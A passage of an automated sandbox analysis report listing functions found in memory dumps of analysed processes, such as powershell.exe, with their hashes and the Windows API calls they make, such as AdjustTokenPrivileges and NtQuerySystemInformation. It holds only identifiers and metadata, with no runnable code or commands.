                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000020.00000002.2184631089.0000000002900000.00000040.00000040.sdmp, Offset: 02900000, based on PE: false
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 531720646af2be61fee461a3f1e897a24150f96d0d7f76ec3210a10052ac50cd
                                                    • Instruction ID: 61633ab0ed311c5e85381215c618c9ca623ff2263c61283b1ee1d0edf4da3720
                                                    • Opcode Fuzzy Hash: 531720646af2be61fee461a3f1e897a24150f96d0d7f76ec3210a10052ac50cd
                                                    • Instruction Fuzzy Hash: 6D01D676509384AFD7128B15EC40862FFB8DE86620708C49FEC898B612C225B909CB72
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0290081E, Relevance: .0, Instructions: 27COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000020.00000002.2184631089.0000000002900000.00000040.00000040.sdmp, Offset: 02900000, based on PE: false
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 3feaac20e2902d9ab147ad8d382b02af86fe55731d060e8969d85e4b71b0b401
                                                    • Instruction ID: 2d97b78ed3e0f0378c9981d098b635965aac1338bae99dc57734dcad2f195c4c
                                                    • Opcode Fuzzy Hash: 3feaac20e2902d9ab147ad8d382b02af86fe55731d060e8969d85e4b71b0b401
                                                    • Instruction Fuzzy Hash: 68E092766007048BDB50CF0AEC41452F7E4EB84A30B18C07FDC0D8B710D275B509CAA1
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 02BE0860, Relevance: .0, Instructions: 24COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000020.00000002.2185361965.0000000002BE0000.00000040.00000001.sdmp, Offset: 02BE0000, based on PE: false
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: ddda04b58674268f478e7400283431d26de2bbf92be98ad3b2883fefae0f440c
                                                    • Instruction ID: 3ebd6c96fd23a3fa2ea92dd626ee29ded3df4e75dd7da33274b843e393fdd39a
                                                    • Opcode Fuzzy Hash: ddda04b58674268f478e7400283431d26de2bbf92be98ad3b2883fefae0f440c
                                                    • Instruction Fuzzy Hash: 73E0E522A0E7D04FC3039764A8A9258BF725B53255B0E40EBD481CF2E3D6185C85D767
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 006D23F4, Relevance: .0, Instructions: 15COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000020.00000002.2176774167.00000000006D2000.00000040.00000001.sdmp, Offset: 006D2000, based on PE: false
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 7f9cd7b3587bf29d96b8f8e682d932e51daf42074fcc41cb751aa0c932c8301f
                                                    • Instruction ID: a4931693364e540622fd56480fcdefee8c5ede4495f3df904074594ab14ba88f
                                                    • Opcode Fuzzy Hash: 7f9cd7b3587bf29d96b8f8e682d932e51daf42074fcc41cb751aa0c932c8301f
                                                    • Instruction Fuzzy Hash: C8D05E79605A828FD7178A1CC1A4B9537D5AF65B04F4644FAEC40CB7A3C768E9D1D200
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 006D23BC, Relevance: .0, Instructions: 14COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000020.00000002.2176774167.00000000006D2000.00000040.00000001.sdmp, Offset: 006D2000, based on PE: false
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: b5cdfdca58a9b0b4faa012c529437d9bec6a451b338b5a150c33ee7596b6b5a5
                                                    • Instruction ID: e5ed1be13f3de15aa434b93eb11df458cf0539a1112551d2458355c124e841e6
                                                    • Opcode Fuzzy Hash: b5cdfdca58a9b0b4faa012c529437d9bec6a451b338b5a150c33ee7596b6b5a5
                                                    • Instruction Fuzzy Hash: 77D05E347006828FDB15CA1CC1A4F9973E5AF90700F0644E9BC008B366C3A8EC80C600
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Non-executed Functions

                                                    Analysis Process: powershell.exe PID: 2300 Parent PID: 1192 powershell.exeCOMMON

                                                    Executed Functions

                                                    Function 0067ACB7, Relevance: 1.6, APIs: 1, Instructions: 75COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • AdjustTokenPrivileges.KERNELBASE(?,?,?,?,?,?), ref: 0067AD37
                                                    Memory Dump Source
                                                    • Source File: 00000022.00000002.2177731906.000000000067A000.00000040.00000001.sdmp, Offset: 0067A000, based on PE: false
                                                    Similarity
                                                    • API ID: AdjustPrivilegesToken
                                                    • String ID:
                                                    • API String ID: 2874748243-0
                                                    • Opcode ID: 694adc6304e58f3c02b93e84050c63b9b4b04eb5b567c268be5f69570d1b7d0d
                                                    • Instruction ID: 38489ca85d46d7e562bdc9c363e336c2a09583ae02877460b489027c29789a11
                                                    • Opcode Fuzzy Hash: 694adc6304e58f3c02b93e84050c63b9b4b04eb5b567c268be5f69570d1b7d0d
                                                    • Instruction Fuzzy Hash: DB21B1765097809FDB228F25DC44B92BFB4EF16310F08849AE9888B663D2319908DB62
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0067ACEE, Relevance: 1.6, APIs: 1, Instructions: 52COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • AdjustTokenPrivileges.KERNELBASE(?,?,?,?,?,?), ref: 0067AD37
                                                    Memory Dump Source
                                                    • Source File: 00000022.00000002.2177731906.000000000067A000.00000040.00000001.sdmp, Offset: 0067A000, based on PE: false
                                                    Similarity
                                                    • API ID: AdjustPrivilegesToken
                                                    • String ID:
                                                    • API String ID: 2874748243-0
                                                    • Opcode ID: 8403bb3cffa0906128651e10f8f8a97e4064129a18d48b0417ad1873e1345cad
                                                    • Instruction ID: aa503ae90267db6b25df40b4e4c886ec1f56e29b4a4a21d17196de62968045ec
                                                    • Opcode Fuzzy Hash: 8403bb3cffa0906128651e10f8f8a97e4064129a18d48b0417ad1873e1345cad
                                                    • Instruction Fuzzy Hash: 7811A076500700DFEB20CFA5D884B96FBE5EF44321F08C46AED498BA62D331E814DB62
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0067B2CC, Relevance: 1.6, APIs: 1, Instructions: 50nativeCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • NtQuerySystemInformation.NTDLL(?,?,?,?), ref: 0067B329
                                                    Memory Dump Source
                                                    • Source File: 00000022.00000002.2177731906.000000000067A000.00000040.00000001.sdmp, Offset: 0067A000, based on PE: false
                                                    Similarity
                                                    • API ID: InformationQuerySystem
                                                    • String ID:
                                                    • API String ID: 3562636166-0
                                                    • Opcode ID: 911935621d5942857b9dbd020ae24dc78ea2b6370cd5306b1df5506def3e338d
                                                    • Instruction ID: 0d3e01809a8828361126116361505ae7e1e8a185f5006265344eafd0bf380899
                                                    • Opcode Fuzzy Hash: 911935621d5942857b9dbd020ae24dc78ea2b6370cd5306b1df5506def3e338d
                                                    • Instruction Fuzzy Hash: F511A071508380AFDB228F11DC45F62FFB4EF16320F09C49AED884B663C275A958DB62
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0067B2EE, Relevance: 1.5, APIs: 1, Instructions: 38nativeCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • NtQuerySystemInformation.NTDLL(?,?,?,?), ref: 0067B329
                                                    Memory Dump Source
                                                    • Source File: 00000022.00000002.2177731906.000000000067A000.00000040.00000001.sdmp, Offset: 0067A000, based on PE: false
                                                    Similarity
                                                    • API ID: InformationQuerySystem
                                                    • String ID:
                                                    • API String ID: 3562636166-0
                                                    • Opcode ID: 8ee967692d01fd6986c9394a8e2c07b685f6b5ce49777893187ccc1072b2f838
                                                    • Instruction ID: a922a7e0686f0923c33a45a4e07bcbda4ca1e464e1fdd75cd546d975ea0b4b76
                                                    • Opcode Fuzzy Hash: 8ee967692d01fd6986c9394a8e2c07b685f6b5ce49777893187ccc1072b2f838
                                                    • Instruction Fuzzy Hash: FD01AD32400700DFEB20DF55D885B62FFA1EF18721F08C09ADD490B612C375A458DB62
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 029B0118, Relevance: 1.6, APIs: 1, Instructions: 100COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • SetConsoleTitleW.KERNEL32(?), ref: 029B01D0
                                                    Memory Dump Source
                                                    • Source File: 00000022.00000002.2185285266.00000000029B0000.00000040.00000001.sdmp, Offset: 029B0000, based on PE: false
                                                    Similarity
                                                    • API ID: ConsoleTitle
                                                    • String ID:
                                                    • API String ID: 3358957663-0
                                                    • Opcode ID: 45781862a9ef4b962ef035a1398cf55d446bcb0f66b29dc4d61c0d0673483845
                                                    • Instruction ID: 4b45f3a8f041fce705390a16aa0f4331cacb24bba35af4f0b326df1f23ee3ace
                                                    • Opcode Fuzzy Hash: 45781862a9ef4b962ef035a1398cf55d446bcb0f66b29dc4d61c0d0673483845
                                                    • Instruction Fuzzy Hash: D431356650E3C08FE7138B759C65692BFB4AF03210F0E84DBD884CF1A3D6299809DB62
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 029B067A, Relevance: 1.6, APIs: 1, Instructions: 93fileCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • CreateFileW.KERNELBASE(?,?,?,?,?,?), ref: 029B072D
                                                    Memory Dump Source
                                                    • Source File: 00000022.00000002.2185285266.00000000029B0000.00000040.00000001.sdmp, Offset: 029B0000, based on PE: false
                                                    Similarity
                                                    • API ID: CreateFile
                                                    • String ID:
                                                    • API String ID: 823142352-0
                                                    • Opcode ID: 965f8beaeea9507e1796e25792e53cd4b6ff558091664998524b5047c44d7f64
                                                    • Instruction ID: 64c0b8d1baec85deea3a123d532493f56a0a5cf7c8e9e047c5c8ddcd7f41bbf9
                                                    • Opcode Fuzzy Hash: 965f8beaeea9507e1796e25792e53cd4b6ff558091664998524b5047c44d7f64
                                                    • Instruction Fuzzy Hash: 4D317071505380AFE722CF65CD85F92FFF8EF06210F09849EE9848B692D325A808CB61
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 029B0D32, Relevance: 1.6, APIs: 1, Instructions: 89registryCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • RegisterEventSourceW.ADVAPI32(?), ref: 029B0DD6
                                                    Memory Dump Source
                                                    • Source File: 00000022.00000002.2185285266.00000000029B0000.00000040.00000001.sdmp, Offset: 029B0000, based on PE: false
                                                    Similarity
                                                    • API ID: EventRegisterSource
                                                    • String ID:
                                                    • API String ID: 1693822063-0
                                                    • Opcode ID: 93bacd20d74c3524d2971e88694a20839046c4ddabead884beeaf72e00923119
                                                    • Instruction ID: db0adf64fd653d3e5a0227e3776731f2a4a765e0fe587a32b9d71463c8ebb571
                                                    • Opcode Fuzzy Hash: 93bacd20d74c3524d2971e88694a20839046c4ddabead884beeaf72e00923119
                                                    • Instruction Fuzzy Hash: D531C871509380AFE712CB25DC45B96BFE8DF06314F0884AAE944CF293D375A905CB71
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0067AF24, Relevance: 1.6, APIs: 1, Instructions: 88COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • K32EnumProcessModules.KERNEL32(?,00000E9C,9C2A452C,00000000,00000000,00000000,00000000), ref: 0067AFBE
                                                    Memory Dump Source
                                                    • Source File: 00000022.00000002.2177731906.000000000067A000.00000040.00000001.sdmp, Offset: 0067A000, based on PE: false
                                                    Similarity
                                                    • API ID: EnumModulesProcess
                                                    • String ID:
                                                    • API String ID: 1082081703-0
                                                    • Opcode ID: cb20640ede3d4b34306873457042ae0877a1e6b6221fc5766975c91e55c0181e
                                                    • Instruction ID: 66b1bd7f3e61fdfd607c7e1ed6ff1493c82460bc38af9bbe06e7f9367e9a7161
                                                    • Opcode Fuzzy Hash: cb20640ede3d4b34306873457042ae0877a1e6b6221fc5766975c91e55c0181e
                                                    • Instruction Fuzzy Hash: 1B21D8B2509380AFE712CF60DC45B96BFB8EF06320F0884DBE985DB193D2659945C771
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0067BD1E, Relevance: 1.6, APIs: 1, Instructions: 88COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetTokenInformation.KERNELBASE(?,00000E9C,9C2A452C,00000000,00000000,00000000,00000000), ref: 0067BDBC
                                                    Memory Dump Source
                                                    • Source File: 00000022.00000002.2177731906.000000000067A000.00000040.00000001.sdmp, Offset: 0067A000, based on PE: false
                                                    Similarity
                                                    • API ID: InformationToken
                                                    • String ID:
                                                    • API String ID: 4114910276-0
                                                    • Opcode ID: 45861e0c694af098038399cc61dd398d66c1c27cd20f6c78406a3267352a0e13
                                                    • Instruction ID: c3236933ca282ff9b7eb905564797dce234779c9742738c9c51e041615d1a182
                                                    • Opcode Fuzzy Hash: 45861e0c694af098038399cc61dd398d66c1c27cd20f6c78406a3267352a0e13
                                                    • Instruction Fuzzy Hash: CE31B472009380AFE712CB60CC45F96BFB8EF06310F08849BE984CB192D224A908C771
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 029B0FEE, Relevance: 1.6, APIs: 1, Instructions: 84COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetVolumeInformationW.KERNELBASE(?,00000E9C,?,?), ref: 029B109E
                                                    Memory Dump Source
                                                    • Source File: 00000022.00000002.2185285266.00000000029B0000.00000040.00000001.sdmp, Offset: 029B0000, based on PE: false
                                                    Similarity
                                                    • API ID: InformationVolume
                                                    • String ID:
                                                    • API String ID: 2039140958-0
                                                    • Opcode ID: 3b937258b33dce97d9baab6cf7ff2b99b478f8436bf0b82620345d5853e94c4c
                                                    • Instruction ID: b5d525ed0c4d0b5dd1c0ee7017c1b6cbad447ae62fb2e702674de8ec081ff865
                                                    • Opcode Fuzzy Hash: 3b937258b33dce97d9baab6cf7ff2b99b478f8436bf0b82620345d5853e94c4c
                                                    • Instruction Fuzzy Hash: 63316F7550E3C0AFD3138B358C55B56BFB4AF43610F1A81DBD8848F2A3D629A909C7A2
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0067B01D, Relevance: 1.6, APIs: 1, Instructions: 82COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • K32GetModuleInformation.KERNEL32(?,00000E9C,9C2A452C,00000000,00000000,00000000,00000000), ref: 0067B0AE
                                                    Memory Dump Source
                                                    • Source File: 00000022.00000002.2177731906.000000000067A000.00000040.00000001.sdmp, Offset: 0067A000, based on PE: false
                                                    Similarity
                                                    • API ID: InformationModule
                                                    • String ID:
                                                    • API String ID: 3425974696-0
                                                    • Opcode ID: 66e6d3297e71f0bf7f9bd970839d799089b88ffb3c52142f5889e080d0c1313a
                                                    • Instruction ID: c116bf9608c9b6b0d27328456c749f153b5a976de410ed781cdfb50fa979e992
                                                    • Opcode Fuzzy Hash: 66e6d3297e71f0bf7f9bd970839d799089b88ffb3c52142f5889e080d0c1313a
                                                    • Instruction Fuzzy Hash: AA219171505380AFE722CB15CC45FA7BFA8EF06320F08849AE949DB192D664E908CB71
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0067A1A8, Relevance: 1.6, APIs: 1, Instructions: 79COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • EnumWindows.USER32(?,00000E9C,?,?), ref: 0067A23E
                                                    Memory Dump Source
                                                    • Source File: 00000022.00000002.2177731906.000000000067A000.00000040.00000001.sdmp, Offset: 0067A000, based on PE: false
                                                    Similarity
                                                    • API ID: EnumWindows
                                                    • String ID:
                                                    • API String ID: 1129996299-0
                                                    • Opcode ID: b1d248e299bf6febb2c01de6487862657fa6f7e0cec9dda3e28466f82e7d0192
                                                    • Instruction ID: 5e5323b36d9c0346367131f3022b016daaf8a39c8be57af70b838fb5a3db94eb
                                                    • Opcode Fuzzy Hash: b1d248e299bf6febb2c01de6487862657fa6f7e0cec9dda3e28466f82e7d0192
                                                    • Instruction Fuzzy Hash: A021C77184D3C06FD3128B758C55B66BFB4EF47620F1981DBD8888F193D229A919C7A2
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 029B0784, Relevance: 1.6, APIs: 1, Instructions: 78COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetFileType.KERNELBASE(?,00000E9C,9C2A452C,00000000,00000000,00000000,00000000), ref: 029B0819
                                                    Memory Dump Source
                                                    • Source File: 00000022.00000002.2185285266.00000000029B0000.00000040.00000001.sdmp, Offset: 029B0000, based on PE: false
                                                    Similarity
                                                    • API ID: FileType
                                                    • String ID:
                                                    • API String ID: 3081899298-0
                                                    • Opcode ID: ed89f91d0652515b97ae31e7b5aa4d3316af8972b0dbfdbcb5c04a0c57292488
                                                    • Instruction ID: 25116508d6c9dcdc3b815e74877769b121b3399718649ea9f7a1293473583149
                                                    • Opcode Fuzzy Hash: ed89f91d0652515b97ae31e7b5aa4d3316af8972b0dbfdbcb5c04a0c57292488
                                                    • Instruction Fuzzy Hash: 7921DA76408784AFE713CB159C45FA7BFA8EF46720F0981DBF9848B193D224A905C771
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 029B0464, Relevance: 1.6, APIs: 1, Instructions: 77COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • SHGetFolderPathW.SHELL32(?,00000E9C,?,?), ref: 029B0502
                                                    Memory Dump Source
                                                    • Source File: 00000022.00000002.2185285266.00000000029B0000.00000040.00000001.sdmp, Offset: 029B0000, based on PE: false
                                                    Similarity
                                                    • API ID: FolderPath
                                                    • String ID:
                                                    • API String ID: 1514166925-0
                                                    • Opcode ID: 93ff3d4bb07a96e3553b47beaac5326f1218870928630617a7f17e8f134a685e
                                                    • Instruction ID: d36583616c4291752b863b9c3b853a962c7269f13d1c5142e46df286f6364acb
                                                    • Opcode Fuzzy Hash: 93ff3d4bb07a96e3553b47beaac5326f1218870928630617a7f17e8f134a685e
                                                    • Instruction Fuzzy Hash: 3721717540E3C0AFD3128B758C55B62BFB4EF47610F1A81CBD8848F693D225A919C7B2
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 029B06AE, Relevance: 1.6, APIs: 1, Instructions: 76fileCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • CreateFileW.KERNELBASE(?,?,?,?,?,?), ref: 029B072D
                                                    Memory Dump Source
                                                    • Source File: 00000022.00000002.2185285266.00000000029B0000.00000040.00000001.sdmp, Offset: 029B0000, based on PE: false
                                                    Similarity
                                                    • API ID: CreateFile
                                                    • String ID:
                                                    • API String ID: 823142352-0
                                                    • Opcode ID: 753f14013a054ca60535d4d2e2da35725f5af746465070fba6b0f92941a4395e
                                                    • Instruction ID: 0a2d615980f70d98fffe532c834aad9ee233f1f2e7f9157d9c9b790fad01f794
                                                    • Opcode Fuzzy Hash: 753f14013a054ca60535d4d2e2da35725f5af746465070fba6b0f92941a4395e
                                                    • Instruction Fuzzy Hash: 59218E71500704EFEB21DF65CD85FA6FBE8EF08650F04846AE9498B692D771E904CB61
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 029B0854, Relevance: 1.6, APIs: 1, Instructions: 75fileCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • ReadFile.KERNELBASE(?,00000E9C,9C2A452C,00000000,00000000,00000000,00000000), ref: 029B08E5
                                                    Memory Dump Source
                                                    • Source File: 00000022.00000002.2185285266.00000000029B0000.00000040.00000001.sdmp, Offset: 029B0000, based on PE: false
                                                    Similarity
                                                    • API ID: FileRead
                                                    • String ID:
                                                    • API String ID: 2738559852-0
                                                    • Opcode ID: 6d544cbf69b389921d0485b4f3bdf0f2a9b6f2bd9a7398ea7c5c03036aba41e2
                                                    • Instruction ID: 6e6d81115c05e1da52adf8bdffbc0fcd53e0f69f79c188065f16399660bb3df5
                                                    • Opcode Fuzzy Hash: 6d544cbf69b389921d0485b4f3bdf0f2a9b6f2bd9a7398ea7c5c03036aba41e2
                                                    • Instruction Fuzzy Hash: DD219272409380AFE722CF51DC45F96BFB8EF06314F09849BE9449B193C265A909CB72
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0067A8B4, Relevance: 1.6, APIs: 1, Instructions: 74threadCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • SetThreadPreferredUILanguages.KERNEL32(?,00000E9C,?,?), ref: 0067A94A
                                                    Memory Dump Source
                                                    • Source File: 00000022.00000002.2177731906.000000000067A000.00000040.00000001.sdmp, Offset: 0067A000, based on PE: false
                                                    Similarity
                                                    • API ID: LanguagesPreferredThread
                                                    • String ID:
                                                    • API String ID: 842807343-0
                                                    • Opcode ID: 6856401c29745309aa1fea26ccc9430c89f53fc8c96f5fce7f58a3ae206e827b
                                                    • Instruction ID: 87c1d3f6d500a4bb4e88d1736088cd1d183d89e640084c6b5489232b97e5bc35
                                                    • Opcode Fuzzy Hash: 6856401c29745309aa1fea26ccc9430c89f53fc8c96f5fce7f58a3ae206e827b
                                                    • Instruction Fuzzy Hash: CA219575409780AFD3138B259C51B62BFB4EF87710F0981DBE8848B653D224A919C7B2
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 029B0D66, Relevance: 1.6, APIs: 1, Instructions: 71registryCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • RegisterEventSourceW.ADVAPI32(?), ref: 029B0DD6
                                                    Memory Dump Source
                                                    • Source File: 00000022.00000002.2185285266.00000000029B0000.00000040.00000001.sdmp, Offset: 029B0000, based on PE: false
                                                    Similarity
                                                    • API ID: EventRegisterSource
                                                    • String ID:
                                                    • API String ID: 1693822063-0
                                                    • Opcode ID: d8c2bc57a7f3d7fa75f296d2f46e05f5f3992e8d7d990d1c8ccf79f461384127
                                                    • Instruction ID: 81606484acac89a7371d53589ccc68a842b777f4867f7da9446311e2791d6eba
                                                    • Opcode Fuzzy Hash: d8c2bc57a7f3d7fa75f296d2f46e05f5f3992e8d7d990d1c8ccf79f461384127
                                                    • Instruction Fuzzy Hash: DE21AE71600304AFF721DF65CD85BA7FBD8EF44210F04846AEC48DB282D775E904CA61
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0067BD52, Relevance: 1.6, APIs: 1, Instructions: 69COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetTokenInformation.KERNELBASE(?,00000E9C,9C2A452C,00000000,00000000,00000000,00000000), ref: 0067BDBC
                                                    Memory Dump Source
                                                    • Source File: 00000022.00000002.2177731906.000000000067A000.00000040.00000001.sdmp, Offset: 0067A000, based on PE: false
                                                    Similarity
                                                    • API ID: InformationToken
                                                    • String ID:
                                                    • API String ID: 4114910276-0
                                                    • Opcode ID: 423eb658e8aa193ea0378f66c765cba87fc8f24be665d992c1ec3e846b9d317b
                                                    • Instruction ID: 4590b41d3d10bd04fd52e738a33cdf15bc8fca1fc17a9aa6b26dc51cdc4c36cc
                                                    • Opcode Fuzzy Hash: 423eb658e8aa193ea0378f66c765cba87fc8f24be665d992c1ec3e846b9d317b
                                                    • Instruction Fuzzy Hash: 72119A72500304EFEB21DF61DC85FAAFBA8EF04320F14856AF949DA281D670A9058BB1
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 029B0F34, Relevance: 1.6, APIs: 1, Instructions: 67COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetDriveTypeW.KERNELBASE(?), ref: 029B0FB0
                                                    Memory Dump Source
                                                    • Source File: 00000022.00000002.2185285266.00000000029B0000.00000040.00000001.sdmp, Offset: 029B0000, based on PE: false
                                                    Similarity
                                                    • API ID: DriveType
                                                    • String ID:
                                                    • API String ID: 338552980-0
                                                    • Opcode ID: f22cc559e30445487ba223ca0b2ffc9cabf5283bca873ff5156103a7bd72bf87
                                                    • Instruction ID: a8e626161294878d47dd8cb8cba3d35cf877b191790257fd2b11fa6f30a8724a
                                                    • Opcode Fuzzy Hash: f22cc559e30445487ba223ca0b2ffc9cabf5283bca873ff5156103a7bd72bf87
                                                    • Instruction Fuzzy Hash: 91215E7160D3C49FDB138B25DC55B96BFB8EF17214F0D84EAD8888F293D2659408CB62
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 029B137E, Relevance: 1.6, APIs: 1, Instructions: 67COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000022.00000002.2185285266.00000000029B0000.00000040.00000001.sdmp, Offset: 029B0000, based on PE: false
                                                    Similarity
                                                    • API ID: ConsoleWrite
                                                    • String ID:
                                                    • API String ID: 2657657451-0
                                                    • Opcode ID: 575d0ea05ce7cfa214147703db349c807b97a825e0448ad47338b3f298f76b10
                                                    • Instruction ID: 6c5769bc67587cb11a0d33ea46eb741d57ad3751cc8eb1d0f5c604b5d979693d
                                                    • Opcode Fuzzy Hash: 575d0ea05ce7cfa214147703db349c807b97a825e0448ad47338b3f298f76b10
                                                    • Instruction Fuzzy Hash: F72192725043809FDB22CF65DC45B96FFF4EF06220F0884AEED898B563D235A449DB61
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0067B04A, Relevance: 1.6, APIs: 1, Instructions: 67COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • K32GetModuleInformation.KERNEL32(?,00000E9C,9C2A452C,00000000,00000000,00000000,00000000), ref: 0067B0AE
                                                    Memory Dump Source
                                                    • Source File: 00000022.00000002.2177731906.000000000067A000.00000040.00000001.sdmp, Offset: 0067A000, based on PE: false
                                                    Similarity
                                                    • API ID: InformationModule
                                                    • String ID:
                                                    • API String ID: 3425974696-0
                                                    • Opcode ID: 5f93e264e3a042887578b01f16be047af2e7a92edf6b4f4d1b296bb0ae654ad8
                                                    • Instruction ID: 62c8cd2284cbb5a74ef84b08c2c55fb8ca77f91ce8038f2982a8a709055ef695
                                                    • Opcode Fuzzy Hash: 5f93e264e3a042887578b01f16be047af2e7a92edf6b4f4d1b296bb0ae654ad8
                                                    • Instruction Fuzzy Hash: 15116A71600300EFEB20DF55DC85FABBBA8EF05760F14C46AE9098B281D764E9048AB1
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0067AAAB, Relevance: 1.6, APIs: 1, Instructions: 66COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • LookupPrivilegeValueW.ADVAPI32(?,?,?), ref: 0067AB1A
                                                    Memory Dump Source
                                                    • Source File: 00000022.00000002.2177731906.000000000067A000.00000040.00000001.sdmp, Offset: 0067A000, based on PE: false
                                                    Similarity
                                                    • API ID: LookupPrivilegeValue
                                                    • String ID:
                                                    • API String ID: 3899507212-0
                                                    • Opcode ID: 8a30c88dde59d7d7bd773aa63a5f6ea0db8f323c3f48cea870dd386efbf5d96f
                                                    • Instruction ID: d46a48ba266a4d01f64e9d14eeec62fc5832d9e56a9cd2e26ffe37f077a8cd00
                                                    • Opcode Fuzzy Hash: 8a30c88dde59d7d7bd773aa63a5f6ea0db8f323c3f48cea870dd386efbf5d96f
                                                    • Instruction Fuzzy Hash: 752172716053809FD722CF65DC44B96FFE8EF56610F0884AAED49CB252D265E804CB72
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0067BABE, Relevance: 1.6, APIs: 1, Instructions: 66COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetConsoleScreenBufferInfo.KERNEL32 ref: 0067BB2F
                                                    Memory Dump Source
                                                    • Source File: 00000022.00000002.2177731906.000000000067A000.00000040.00000001.sdmp, Offset: 0067A000, based on PE: false
                                                    Similarity
                                                    • API ID: BufferConsoleInfoScreen
                                                    • String ID:
                                                    • API String ID: 3437242342-0
                                                    • Opcode ID: df2472f547f4c74836b9d4f4e6a5bb5a473ef4fcada3f123406719b0c4b964c7
                                                    • Instruction ID: 28a7ee93d57662e0b320e9da83523a81e4cca5af0fd54bd472af0086b6a98721
                                                    • Opcode Fuzzy Hash: df2472f547f4c74836b9d4f4e6a5bb5a473ef4fcada3f123406719b0c4b964c7
                                                    • Instruction Fuzzy Hash: 9721A1725093C09FEB128B25DC55B92BFE4EF07320F0984DBDD858F263D224A908DB61
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 029B10D4, Relevance: 1.6, APIs: 1, Instructions: 65threadCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • SetThreadUILanguage.KERNEL32(?), ref: 029B1148
                                                    Memory Dump Source
                                                    • Source File: 00000022.00000002.2185285266.00000000029B0000.00000040.00000001.sdmp, Offset: 029B0000, based on PE: false
                                                    Similarity
                                                    • API ID: LanguageThread
                                                    • String ID:
                                                    • API String ID: 243849632-0
                                                    • Opcode ID: cfb55e164f2183b88a1debc320db6127bfc93eb5508a7b70a525d9addfc3c9e4
                                                    • Instruction ID: d41dd45b283236aeeb744bfa6883f5a07210dd0d5283c50f65e0306eb71332ec
                                                    • Opcode Fuzzy Hash: cfb55e164f2183b88a1debc320db6127bfc93eb5508a7b70a525d9addfc3c9e4
                                                    • Instruction Fuzzy Hash: 4A216D6140D3C09FD7138B259C64A62BFB4EF57620F0980DBDC848F2A3D2695808D772
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0067AF62, Relevance: 1.6, APIs: 1, Instructions: 63COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • K32EnumProcessModules.KERNEL32(?,00000E9C,9C2A452C,00000000,00000000,00000000,00000000), ref: 0067AFBE
                                                    Memory Dump Source
